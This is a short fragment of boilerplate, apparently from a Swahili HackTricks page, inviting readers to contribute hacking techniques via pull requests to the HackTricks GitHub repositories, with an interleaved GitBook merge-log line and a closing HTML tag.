			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`</details>`